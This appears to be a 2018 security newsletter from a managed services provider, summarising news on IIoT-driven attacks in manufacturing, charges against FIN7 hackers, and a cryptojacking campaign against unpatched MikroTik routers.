19th Ave New York, NY 95822, USA

Insight Weekly Security News Letter-10-Aug-2018

The proliferation of industrial internet of things (IIoT) devices is reportedly at the root of the higher than normal rates of reconnaissance related to cyber-attacks and lateral movement activity in the manufacturing industry.

Industrial IOT Enables Attacks in Manufacturing Industries:

The proliferation of industrial internet of things (IIoT) devices is reportedly at the root of the higher than normal rates of reconnaissance related to cyber-attacks and lateral movement activity in the manufacturing industry.

The new 2018 Spotlight Report on Manufacturing analyzed attacker behaviors and network trends from more than 250 manufacturing enterprises. For six months, monitored network traffic, collecting metadata from customer cloud, data center and enterprise environments.

Analysis of the metadata garnered from over 4 million devices, and workloads revealed the ways in which the manufacturing industry is a prime target for attack.

Attackers who are able to bypass perimeter security gain network access, where they collect intel on their victims. The research revealed an unusually high volume of reconnaissance behavior, suggesting that attackers are mapping out manufacturing networks to locate critical assets.

Because the networks often have insufficient internal access controls, criminals are able to steal sensitive information with relative ease, the report found. Once attackers infiltrate the network, they proliferate the attack inside the network, evidenced by the findings that there is an abnormally high level of lateral movement.

Given that security controls can interrupt and isolate manufacturing systems, many manufacturers fail to invest in them. Instead, factories connect IIoT devices to flat, unpartitioned networks that have to communicate with general computing devices and enterprise applications, according to the report.

In the past, manufacturers relied on more customized, proprietary protocols, which made mounting an attack more difficult for cybercriminals. The conversion from proprietary protocols to standard protocols makes it easier to infiltrate networks to spy, spread and steal,” the report stated

Attempts to automate real-time data collection across integrated digital systems, IIoT devices and cloud computing resources in the manufacturing supply chain is an effort known as Industry 4.0. Using IIoT devices to converge enterprise information technology with operational technology networks in manufacturing organizations has enabled not only intellectual property theft but also business disruption.

The interconnectedness of Industry 4.0-driven operations, such as those that involve industrial control systems, along with the escalating deployment of IIoT devices, has created a massive attack surface for cybercriminals to exploit

Reference:

https://www.infosecurity-magazine.com/news/iiot-enables-attacks-in/

FIN7 Hackers Charged With Stealing 15 Million Credit Cards

Three members of one of the world’s largest cybercrime organizations that stole over a billion euros from banks across the world over the last five years.

FIN7, the hackers group behind Carbanak and Cobalt malware and were arrested last year in Europe between January and June.

First uncovered by Russian cybersecurity firm Kaspersky Labs in 2014, FIN7 started its activities almost five years ago by launching a series of malware attacks using Anunak and Carbanak to compromise banks and ATM networks worldwide, from which they swiped millions of credit card details from US-based retailers.

How it works?

To compromise bank networks, FIN7 sent malicious spear-phishing emails to hundreds of employees at different banks, which infected computers with Carbanak malware if opened, allowing attackers to transfer money from the banks to fake accounts or ATMs monitored by them

Hackers Attack Over 200,000 MikroTik Routers & Infected with Mass Coinhive Cryptojacking Malware

Security researchers have discovered at least three massive malware campaigns exploiting hundreds of thousands of unpatched MikroTik routers to secretly install cryptocurrency miners on computers connected to them.

Impact:

 The security flaw can potentially allow an attacker to gain unauthenticated, remote administrative access to any vulnerable MikroTik router.

The first campaign, noticed by Trustwave researchers, began with targeting networking devices in Brazil, where a hacker or a group of hackers compromised more than 183,700 MikroTik routers.

Since other hackers have also started exploiting MikroTik router vulnerability, the campaign is spreading on a global scale.

How it works?

The attackers are injecting Coinhive’s Javascript into every web page that a user visits using a vulnerable router, eventually forcing every connected computer to unknowingly mine Monero cryptocurrency for the miscreants.

Remediation:

A single patch provided by MicroTik, which is available since April is “enough to stop this exploitation in its tracks.”

TAG: Managed Network ServicesNetwork Operation CenterManaged Services Provider

Leave a comment